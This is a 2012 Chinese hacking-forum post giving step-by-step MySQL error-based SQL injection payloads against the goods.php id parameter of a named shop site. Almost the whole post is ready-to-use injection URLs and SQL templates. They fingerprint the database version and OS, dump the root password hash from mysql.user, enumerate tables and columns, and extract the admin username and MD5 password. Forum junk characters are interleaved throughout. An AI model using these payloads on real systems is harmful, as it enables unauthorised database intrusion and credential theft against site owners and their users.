找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2227|回复: 0
打印 上一主题 下一主题

盲注详细内容

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-5 14:59:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
判断版本号 # }& L: ]$ b- `( z
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23/ `' l; C( o$ u$ t* I3 M

  v- `5 m7 ^; Q* W5 Y. r; t判断系统
$ }( C* l+ \9 I  c: w9 h1 t% e3 h) e( i! X1 {; x9 X% H0 u% w
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23* Q! T* _* l$ `% Z7 L0 z4 R
7 z1 I+ y% r  j$ j

* k1 }% |7 S# H  e7 j+ v/ [4 \+ B- `2 `. O8 A/ ~
当前 user()
" v4 j+ U' }7 c
: _$ V$ `1 V1 |4 [8 p5 F* n( chttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
2 o, f* i7 H$ g9 W1 o) X
0 Z' J3 `/ Y9 s. {. \# P3 y; @( ~4 T, v$ ?* w
3 v( H# M5 _) t
当前 database()3 o5 P) ?" ~2 _  j1 G
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
$ P7 }" Z) b/ o% k
& s: w. S7 U& n# o: \1 B% B6 J: {* ?. h1 i! \3 t
. v/ w" P* ]  D- |

8 q. `( L' O, M& hroot hash
; A$ k$ ^3 y! f
% x0 u7 Y( e. F* y! S/ s# jhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23$ k+ C1 }1 l% Z& ?* R, h) ?! m, A
) X, j! Y# F' Q6 H  p+ [* i. S/ n
8 s, f: e0 ~3 \! Y% l
3 r0 {3 M9 v) k! L' ~
当前 数据库表名
6 S* L- R" {! _, _, C1 D: W: d9 J* E! m. W: K2 ^
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%233 H3 u5 u1 J# ]% ?: @) F

, @) ~! ~5 h  w+ |( C/ a
$ t3 U3 L. k4 z% K
' K6 v  X4 R8 o# N/ f* d7 J当前 数据库 user_name 字段
3 t; L+ q" \2 h4 ?. ~
! |( u6 e9 @  b6 h  E: D# Lhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
! |9 y* S7 m0 c& L5 p! ]
' N* U* g4 V0 e6 d当前 数据库 字段 password% r9 }; b: F5 n& ~! u: `- y4 a
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%238 W- i6 j; |7 x- f1 [# v* E( {
( r) b8 f% j) a/ {. R  r
  x/ J& q7 Z) Z% W. b0 H
' A& @  r! Z* e1 c
获得 admin passwd(md5), z3 D  c- {4 A: ]' ~. U
# S9 o4 C1 \0 T

& \% X. k, K) m3 u0 F4 v" qhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
3 u& P* h. M& ?0 e6 Q# |% H# c4 t; p( g+ h9 ]
报错注射) G( F" O2 o  R! @
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)3 b& u& f/ x& B

5 f7 P6 I. ^9 ]$ m. W2 ZSELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)' Z& @8 D% @$ i, a3 b( R5 D

. M; `# N# Q3 tand(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表